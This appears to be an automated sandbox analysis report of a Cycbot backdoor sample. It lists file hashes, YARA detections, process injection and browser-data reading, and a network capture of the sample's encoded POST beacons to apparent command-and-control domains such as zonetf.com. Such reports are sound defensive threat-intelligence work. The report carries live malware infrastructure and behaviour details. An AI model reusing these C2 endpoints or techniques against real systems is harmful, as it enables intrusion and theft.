Analysis
- max time kernel: 140s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 10/12/2024, 20:57 UTC
- Static task: static1
- Behavioral task: behavioral1 (sample de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe, resource win7-20240903-en)
- Behavioral task: behavioral2 (sample de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe, resource win10v2004-20241007-en)
General
- Target: de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
- Size: 201KB
- MD5: de74448b4a398e9df200dcfdc2c6f7e5
- SHA1: 1065fe6f58880976cfeab0e57d9f35de587a54e4
- SHA256: b8417527766e5b64a490cafb0105e6df80dcea8a9c2dca88ce2fcc79a703724a
- SHA512: 0591178849d17f12227eea866cff806a91fae6ec8cca45fcd45aa51d89aed6adf2c9c3bf8f0b61d92156ef66b0ecf41b5d88c19cb75548bb770826ad46254517
- SSDEEP: 3072:ptZBDetdPfnhv7o4CbWnHcU3zbjgUznaBVrEOKQz6Mq3TlMg2agNFGvynNE1HJSg:ptZBDebfnhjJfDgUzSEetg2agKveUQF
Malware Config
Signatures
- Cycbot family
- Detects Cycbot payload (4 IoCs)
  Cycbot is a backdoor and trojan written in C++.
  resource | yara_rule
  behavioral1/memory/1740-5-0x0000000000400000-0x000000000044D000-memory.dmp | family_cycbot
  behavioral1/memory/2504-12-0x0000000000400000-0x000000000044D000-memory.dmp | family_cycbot
  behavioral1/memory/2192-78-0x0000000000400000-0x000000000044D000-memory.dmp | family_cycbot
  behavioral1/memory/2504-168-0x0000000000400000-0x000000000044D000-memory.dmp | family_cycbot
- Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- YARA rule upx
  resource | yara_rule
  behavioral1/memory/2504-2-0x0000000000400000-0x000000000044D000-memory.dmp | upx
  behavioral1/memory/1740-5-0x0000000000400000-0x000000000044D000-memory.dmp | upx
  behavioral1/memory/2504-12-0x0000000000400000-0x000000000044D000-memory.dmp | upx
  behavioral1/memory/2192-78-0x0000000000400000-0x000000000044D000-memory.dmp | upx
  behavioral1/memory/2504-168-0x0000000000400000-0x000000000044D000-memory.dmp | upx
- System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description | pid | Process | procid_target
  PID 2504 wrote to memory of 1740 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 31
  PID 2504 wrote to memory of 1740 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 31
  PID 2504 wrote to memory of 1740 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 31
  PID 2504 wrote to memory of 1740 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 31
  PID 2504 wrote to memory of 2192 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 33
  PID 2504 wrote to memory of 2192 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 33
  PID 2504 wrote to memory of 2192 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 33
  PID 2504 wrote to memory of 2192 | 2504 | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 33
Processes
- C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe (PID 2504)
  Command line: "C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe (PID 1740, child of 2504)
    Command line: C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft
    Signatures: System Location Discovery: System Language Discovery
  - C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe (PID 2192, child of 2504)
    Command line: C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming
    Signatures: System Location Discovery: System Language Discovery
Network

Flows (in capture order):

- DNS (remote address 8.8.8.8:53)
  Request: rossroadbags.com IN A
  Response: none

- DNS (remote address 8.8.8.8:53)
  Request: zonetf.com IN A
  Response: zonetf.com IN A 76.223.54.146; zonetf.com IN A 13.248.169.48

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5G
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5G HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- DNS (remote address 8.8.8.8:53)
  Request: offlineservermonitoring.com IN A
  Response: none

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- DNS (remote address 8.8.8.8:53)
  Request: zonetk.com IN A
  Response: none

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3D
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- DNS (remote address 8.8.8.8:53)
  Request: www.google.com IN A
  Response: www.google.com IN A 142.250.187.196

- HTTP (remote address 142.250.187.196:80)
  Request:
    GET / HTTP/1.0
    Connection: close
    Host: www.google.com
    Accept: */*
  Response:
    HTTP/1.0 302 Found
    x-hallmonitor-challenge: CgwIlNfiugYQz-7glgMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yRr0VwdPngZ15b3yi7v0NQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 10 Dec 2024 20:59:00 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-UDnVwSyMe3vTLWnJOR1Bozayoj4iNyLftJ5FLrikh4vSE4CnFe7o0; expires=Sun, 08-Jun-2025 20:59:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax

- HTTP (remote address 76.223.54.146:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G
  Request:
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
  Response:
    HTTP/1.1 405 Method Not Allowed
    connection: close

- HTTP (remote address 142.250.187.196:80)
  Request:
    GET / HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
  Response:
    HTTP/1.1 302 Found
    x-hallmonitor-challenge: CgwIl9fiugYQp-KAxAISBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-61aLTSR5kyYKw8LxiJ-23w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 10 Dec 2024 20:59:03 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-U1oFw_ehwT-fTICYHQbZEQEjQCsg7_8QPtMsFvvrZCczZmbzeL-g; expires=Sun, 08-Jun-2025 20:59:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close

- HTTP (remote address 142.250.187.196:80, process de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe)
  URL: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
  Request:
    GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
  Response:
    HTTP/1.1 429 Too Many Requests
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3075
    X-XSS-Protection: 0
    Connection: close
Traffic summary (destination | request | proto | process | bytes sent | bytes received | packets sent | packets received):

- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5G | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 553 B | 245 B | 5 | 4
  HTTP response: 405
- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 635 B | 245 B | 6 | 4
  HTTP response: 405
- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 581 B | 245 B | 5 | 4
  HTTP response: 405
- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 563 B | 245 B | 5 | 4
  HTTP response: 405
- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3D | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 583 B | 245 B | 5 | 4
  HTTP response: 405
- 142.250.187.196:80 | GET http://www.google.com/ | http | (not captured) | 394 B | 1.5kB | 7 | 5
  HTTP response: 302
- 76.223.54.146:80 | POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 627 B | 245 B | 6 | 4
  HTTP response: 405
- 142.250.187.196:80 | GET http://www.google.com/ | http | (not captured) | 307 B | 1.5kB | 5 | 5
  HTTP response: 302
- 142.250.187.196:80 | GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | http | de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe | 526 B | 3.7kB | 6 | 7
  HTTP response: 429
- 8.8.8.8:53 | DNS request rossroadbags.com | dns | (not captured) | 62 B | 135 B | 1 | 1
  DNS response: none
- 8.8.8.8:53 | DNS request zonetf.com | dns | (not captured) | 56 B | 88 B | 1 | 1
  DNS response: 76.223.54.146, 13.248.169.48
- 8.8.8.8:53 | DNS request offlineservermonitoring.com | dns | (not captured) | 73 B | 146 B | 1 | 1
  DNS response: none
- 8.8.8.8:53 | DNS request zonetk.com | dns | (not captured) | 56 B | 129 B | 1 | 1
  DNS response: none
- 8.8.8.8:53 | DNS request www.google.com | dns | (not captured) | 60 B | 76 B | 1 | 1
  DNS response: 142.250.187.196
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: d88490002a91235ca412d4a15d136e3a
  SHA1: adb79c01f03740278d72d2298e2164d5098dbf0c
  SHA256: 95f385d1cfa6dbae6f0bd38d48374537cf4f19ccbcc2b148a0138099906e5c57
  SHA512: 262ae8babc77e8c9a6137a057cd5b40d9c729922cfcea6b2a5be8350ae10bf7d646bf5c6ba491fa5021bce33d07c0c99f7cb9bd98bea308875ad198ef3f1db02
- Filesize: 600B
  MD5: e49874dadf21c071163b0d0aa7c0170c
  SHA1: 7346aba8dc5b2f2f53b3cdfa6c52dea984f8a3b3
  SHA256: 21e86468d221d534b35b2bc982b979c9267ed750e4a95d508bfcc00c61ec8489
  SHA512: efdb4407b5c0ea6daaea3da93bad3092e9241ba286d57f1c8495f44e5cdf02cbab579d05ae8dc4c36423cc2609998d5c627472d818d622558461d1f95561bd8e
- Filesize: 996B
  MD5: cc831d3dd9f663401acae75e5796ffe1
  SHA1: 8ab02aedbffef667dc64d01d15003c7cd203e4e8
  SHA256: a04832cb0288a05edf98d134ff79679bcf72eb93932dda5fd388c68e0f293b64
  SHA512: 852d4ccbd91d5d9996efc783e7733875fe74b0cadbf1db8c05e41b3c59f2c71dbf83f5429dfb143b1b1c70cafa8c61e010287b7251a1744f549f0925831705f2